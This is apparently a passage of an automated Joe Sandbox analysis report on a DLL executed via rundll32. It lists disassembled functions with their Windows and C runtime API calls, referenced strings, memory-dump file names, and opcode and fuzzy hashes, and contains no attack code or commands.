Instruction ID: 8ec26202c106691d72478eed222520a6e30d1cb825b7d1c94e22465ec1c68f9d
Opcode Fuzzy Hash: 33d2bf27483d04382989d274a53bbefd1c41525da4d7f4bc6e43fef10d3baaa5
Instruction Fuzzy Hash: BD312772A003669FFB10CF289CC5B9D7BB5FB44340F9540AAF549EB182DA709E848B50

Uniqueness

Uniqueness Score: -1.00%

Function 10025110, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 10025150
GetSystemMetrics.USER32 ref: 10025168
GetSystemMetrics.USER32 ref: 1002516F

Strings

B, xrefs: 1002512F
DISPLAY, xrefs: 1002518C

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: System$Metrics$InfoParameters
String ID: B$DISPLAY
API String ID: 3136151823-3316187204
Opcode ID: b6b25803d1236a503b5fcdcee7e41ccf2bd8b680c30ee70901717e7f43f6efc3
Instruction ID: b60a64a5d5410e3ad8fe5a59109b18ab5d44eebb328e5d1eff8611f1e2dd37b9
Opcode Fuzzy Hash: b6b25803d1236a503b5fcdcee7e41ccf2bd8b680c30ee70901717e7f43f6efc3
Instruction Fuzzy Hash: 4511E771901334AFEB52DF64DC85B9B7BA8EF45791F414061FD0AAE006D672D910CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 10022E4B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

Edit, xrefs: 10022E9F

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: Edit
API String ID: 0-554135844
Opcode ID: ae77f75da73c1987e0fa940b5ef14957e5d7f7bc95fc6b37df26c4b3c60db9f7
Instruction ID: d6f5fafa54f95e57ce7326ac47ec6df47115e019fe7e1f47642f1b857b3d0bbf
Opcode Fuzzy Hash: ae77f75da73c1987e0fa940b5ef14957e5d7f7bc95fc6b37df26c4b3c60db9f7
Instruction Fuzzy Hash: 4611A131200205BBEE20DAA1AC05F5EB6ECFF46791F930929F956D64B1CF61DC80E564

Uniqueness

Uniqueness Score: -1.00%

Function 10037474, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 1003748E

Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780

__getptd.LIBCMT ref: 1003749F
__getptd.LIBCMT ref: 100374AD

Strings

csm, xrefs: 10037487
MOC, xrefs: 10037480

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$csm
API String ID: 803148776-1389381023
Opcode ID: e3b2ebf427159775b670ccfe04d8264cb15add95c28ba503ee76d0db9538cd89
Instruction ID: 4aa484bfd58dbd3435781d5c114dead901570b21edfee72e4775129354a6ca63
Opcode Fuzzy Hash: e3b2ebf427159775b670ccfe04d8264cb15add95c28ba503ee76d0db9538cd89
Instruction Fuzzy Hash: 59E012395142448FC322DA64D046B283AE4FB4A216F5A04A1E54C8F223CB38F8809692

Uniqueness

Uniqueness Score: -1.00%

Function 10002AB0, Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 181COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,1000308E,00000000,00000000), ref: 10002B05
SetLastError.KERNEL32(0000007E), ref: 10002B47

Strings

@t Ot, xrefs: 10002B05

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLastRead
String ID: @t Ot
API String ID: 4100373531-710815163
Opcode ID: 97caa88e84ccd89aa93ae28ac998ff8c0d132747f048963a4391c92f1473f43e
Instruction ID: 796d6741741126c51599b2b906ad2ab7a2c15db3fbae67425d52538266fc70d6
Opcode Fuzzy Hash: 97caa88e84ccd89aa93ae28ac998ff8c0d132747f048963a4391c92f1473f43e
Instruction Fuzzy Hash: C38182B4A00209DFEB04CF94C981A9EB7B1FF88354F248559E819AB355D735EE82CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1002A742, Relevance: 7.6, APIs: 5, Instructions: 54stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,?,00000000), ref: 1002A76E
_memset.LIBCMT ref: 1002A78B
GetWindowTextA.USER32 ref: 1002A7A5
lstrcmpA.KERNEL32(00000000,?), ref: 1002A7B7
SetWindowTextA.USER32(?,?), ref: 1002A7C3

Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
String ID:
API String ID: 289641511-0
Opcode ID: eba42bef06e1ea26d0eb59e6d93e6a074b965602a881250286a8b19bcf32aa76
Instruction ID: 26b6340e82542b1e4468bed3117474a07e50960d7f5f1af9f26f2e201bf88dc7
Opcode Fuzzy Hash: eba42bef06e1ea26d0eb59e6d93e6a074b965602a881250286a8b19bcf32aa76
Instruction Fuzzy Hash: 6201C4B6600224ABEB11DB64AEC4BDA77BCEB56750F410062FA05D3141DA709E8487A4

Uniqueness

Uniqueness Score: -1.00%

Function 1003303D, Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 10033049

Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780

__amsg_exit.LIBCMT ref: 10033069
__lock.LIBCMT ref: 10033079
InterlockedDecrement.KERNEL32(?), ref: 10033096
InterlockedIncrement.KERNEL32(03531608), ref: 100330C1

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: b7e179927d4189d82ebcc7d242cd09fbde42b95b3021a06d9a3f9b095d1226b3
Instruction ID: 0569f5a3ac8da4acb0d1a986d046cd977373cb471ce5986ef029c0716cf573c4
Opcode Fuzzy Hash: b7e179927d4189d82ebcc7d242cd09fbde42b95b3021a06d9a3f9b095d1226b3
Instruction Fuzzy Hash: 6701AD35E01B61AFE716DB68889675E77A0FF01BA2F018205F910AF3A1CB347850CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 10043707, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 157COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 1004370E
_Fputc.LIBCPMT ref: 10043762
_Fputc.LIBCPMT ref: 10043890

Strings

, xrefs: 1004381A

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: Fputc$H_prolog3_
String ID:
API String ID: 2569218679-3916222277
Opcode ID: 958f7fde8cf3934525be4b4590de41da191db7979d055f19d5a6abdfe82d0e64
Instruction ID: 327ff4da5823006f03605dc28747a7ba7b3d1cf190d8e7353a19ee1d8cd02c88
Opcode Fuzzy Hash: 958f7fde8cf3934525be4b4590de41da191db7979d055f19d5a6abdfe82d0e64
Instruction Fuzzy Hash: 74515CB6A046489BCB29CBA4C8919DEB7B5EF48310F31D539F552E7291EF70B808CB54

Uniqueness

Uniqueness Score: -1.00%

Function 10028683, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
Part of subcall function 1002A6AB: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
Part of subcall function 1002A6AB: LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714

Part of subcall function 1002ACFB: __EH_prolog3_catch.LIBCMT ref: 1002AD02

Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71

GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 100286CC
FreeLibrary.KERNEL32(?), ref: 100286DC

Strings

hhctrl.ocx, xrefs: 100286B0
HtmlHelpA, xrefs: 100286C6

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: HtmlHelpA$hhctrl.ocx
API String ID: 3274081130-63838506
Opcode ID: 7eafd78b95f4e71f9a7c2a9e0d78888fac0c88a0cb5b3df1705197983d44129d
Instruction ID: 005129d9915a41a8e27983cdb1c3ef0c0b08f3353e048253c6f2f10206dc3ba7
Opcode Fuzzy Hash: 7eafd78b95f4e71f9a7c2a9e0d78888fac0c88a0cb5b3df1705197983d44129d
Instruction Fuzzy Hash: 7D01AD39001A07ABD722DB60FD09B4B3BD4EF04751F90882AFA5AA5462DB70E9509B59

Uniqueness

Uniqueness Score: -1.00%

Function 10037AE5, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 10037AF8

Part of subcall function 10037A53: ___BuildCatchObjectHelper.LIBCMT ref: 10037A89

_UnwindNestedFrames.LIBCMT ref: 10037B0F
___FrameUnwindToState.LIBCMT ref: 10037B1D

Strings

csm, xrefs: 10037AF4, 10037B09, 10037B1C, 10037B3A, 10037B4A

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm
API String ID: 2163707966-1018135373
Opcode ID: f195471c9651215b8799b1dff3133e99b074ac86d89a3ab6fa62fa96ed46b13b
Instruction ID: f623d6fd13c583f27d9dc74078cf60041b57e54907eb0ea25ac4e83ce510980d
Opcode Fuzzy Hash: f195471c9651215b8799b1dff3133e99b074ac86d89a3ab6fa62fa96ed46b13b
Instruction Fuzzy Hash: 1301E475001109BFDF239E51CC41EAB7FAAFF08392F108014BD1C19121D736E9A1EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1003B6EA, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,1003198E), ref: 1003B6EF
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1003B6FF

Strings

KERNEL32, xrefs: 1003B6EA
IsProcessorFeaturePresent, xrefs: 1003B6F9

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: b625c795e4b14fe0a5397004e64ae313e176778416d8ae412e329f0da2c945c9
Instruction ID: 1963b1661ff3506828beccd1ed570aedb4cc9858b4c3caadb466faf93440aec0
Opcode Fuzzy Hash: b625c795e4b14fe0a5397004e64ae313e176778416d8ae412e329f0da2c945c9
Instruction Fuzzy Hash: FAF09030D0090DE6EF006BA1AE4A2AF7BB8FB8134AF9204A0E295F0094CF30C074C345

Uniqueness

Uniqueness Score: -1.00%

Function 10043F42, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10043F49

Part of subcall function 1001E9D0: _strlen.LIBCMT ref: 1001E9EF

std::bad_exception::bad_exception.LIBCMT ref: 10043F66

Part of subcall function 10043EBB: std::runtime_error::runtime_error.LIBCPMT ref: 10043EC6

__CxxThrowException@8.LIBCMT ref: 10043F74

Part of subcall function 100312CD: RaiseException.KERNEL32(?,?,1004B6B4,1004F1B8,?,?,?,100203CA,1004B6B4,1004F1B8,00000000,00000000), ref: 1003130F

Strings

invalid string position, xrefs: 10043F4E

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: ExceptionException@8H_prolog3RaiseThrow_strlenstd::bad_exception::bad_exceptionstd::runtime_error::runtime_error
String ID: invalid string position
API String ID: 843739861-1799206989
Opcode ID: 45ad777bced333e79dc8783b5ddc33aee8a57e63d6a6dab2f02a1dc112f26aec
Instruction ID: 29482f66c8a5f8716b1ced5184e44cdebd8c398cac92a99365ce02766c2dbf89
Opcode Fuzzy Hash: 45ad777bced333e79dc8783b5ddc33aee8a57e63d6a6dab2f02a1dc112f26aec
Instruction Fuzzy Hash: 6FD0127580004D9ADB05DBD0CC55EDE7378EB14311F541835B301EA041DF747A49C658

Uniqueness

Uniqueness Score: -1.00%

Function 10003190, Relevance: 6.4, APIs: 5, Instructions: 119COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000007F), ref: 100031BF
SetLastError.KERNEL32(0000007F), ref: 100031EB

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: be243d1140ffaf3f5c0c670d3f2cc449d13f2587e7475c66dd1e7082ab2392ba
Instruction ID: 4eaf8ab176a3ef0a7f39cefad6a7452b8358f787e5b85b158199dac7f5a3fe15
Opcode Fuzzy Hash: be243d1140ffaf3f5c0c670d3f2cc449d13f2587e7475c66dd1e7082ab2392ba
Instruction Fuzzy Hash: D051E770E0415ADFEB05CF98C981AAEB7F5FF48344F2085A9E815AB349D734EA41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10043370, Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 10043377
_fgetc.LIBCMT ref: 100434AD

Part of subcall function 100432DD: std::_String_base::_Xlen.LIBCPMT ref: 100432F3

_memcpy_s.LIBCMT ref: 10043472
_ungetc.LIBCMT ref: 100434F8

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: H_prolog3_String_base::_Xlen_fgetc_memcpy_s_ungetcstd::_
String ID:
API String ID: 9762108-0
Opcode ID: 99201e9437667c55015348abdb3458414e8582c21c8e059d90a996027ebc780c
Instruction ID: 13a944e20a8a26727cade03676e391ccd69925211a3dd35b2a339be84363c332
Opcode Fuzzy Hash: 99201e9437667c55015348abdb3458414e8582c21c8e059d90a996027ebc780c
Instruction Fuzzy Hash: CF515C76A006089FCB15DBB4C8919DEB7B9FF48210F70953AE552E7191EE60F908CB54

Uniqueness

Uniqueness Score: -1.00%

Function 10044EAE, Relevance: 6.1, APIs: 4, Instructions: 137COMMONLIBRARYCODE

Download Yara Rule

APIs

__flush.LIBCMT ref: 10044F72
__fileno.LIBCMT ref: 10044F92
__locking.LIBCMT ref: 10044F99
__flsbuf.LIBCMT ref: 10044FC4

Part of subcall function 10030D24: __getptd_noexit.LIBCMT ref: 10030D24

Part of subcall function 10032DE1: __decode_pointer.LIBCMT ref: 10032DEC

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
String ID:
API String ID: 3240763771-0
Opcode ID: 956221b4076386118c712c8f64a0eb647298e6b25e76d36a604d25e1bab44899
Instruction ID: f2cbb9fbd7bb741866626b2388375d2bcd999be80ff2815986012e88e7b340f8
Opcode Fuzzy Hash: 956221b4076386118c712c8f64a0eb647298e6b25e76d36a604d25e1bab44899
Instruction Fuzzy Hash: 48418F35A00605DFDB15CFAA888099EB7F6EF80360F328639E855D7580EB71EE45CB48

Uniqueness

Uniqueness Score: -1.00%

Function 1003EEC4, Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1003EEF8
__isleadbyte_l.LIBCMT ref: 1003EF2C
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,?,?,1004E688,00000000,00000000,00000020), ref: 1003EF5D
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,?,?,1004E688,00000000,00000000,00000020), ref: 1003EFCB

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 96643137e7721e308861157e0faa2d4bf1abe89a8bc138eb09a9c9d576fa028f
Instruction ID: 26013823be584ed4b010159d5efc2338de830fada2216c2f4930337caeab7791
Opcode Fuzzy Hash: 96643137e7721e308861157e0faa2d4bf1abe89a8bc138eb09a9c9d576fa028f
Instruction Fuzzy Hash: 52318931A002D6EFDB12DF64C880AAA7BE5EF41352F1286A9F4648F1E1D770AD40DB50

Uniqueness

Uniqueness Score: -1.00%

Function 1002B564, Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

__msize.LIBCMT ref: 1002B5F7
__msize.LIBCMT ref: 1002B61A
_malloc.LIBCMT ref: 1002B632
_malloc.LIBCMT ref: 1002B647

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: __msize_malloc
String ID:
API String ID: 1288803200-0
Opcode ID: e7775de412d4773406d2d7f9127a0febec078a8c984ec9c0c9f408937bca0ff2
Instruction ID: c06ad2b89a0fc854e88fd2117b33bcd0e6f9c9f7914c74f6532cfdf5cd9cd5d6
Opcode Fuzzy Hash: e7775de412d4773406d2d7f9127a0febec078a8c984ec9c0c9f408937bca0ff2
Instruction Fuzzy Hash: 9D218231600E249FCB55EF30F8C9A5A77E5EF04790BD18519E8598B256DF34ECA0CB80

Uniqueness

Uniqueness Score: -1.00%

Function 10003310, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 77memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,?,10003158), ref: 100033CE
GetProcessHeap.KERNEL32(00000000,00000000,?,?,10003158), ref: 100033DA
HeapFree.KERNEL32(00000000,?,?,10003158), ref: 100033E1

Strings

Ot, xrefs: 100033DA

Memory Dump Source

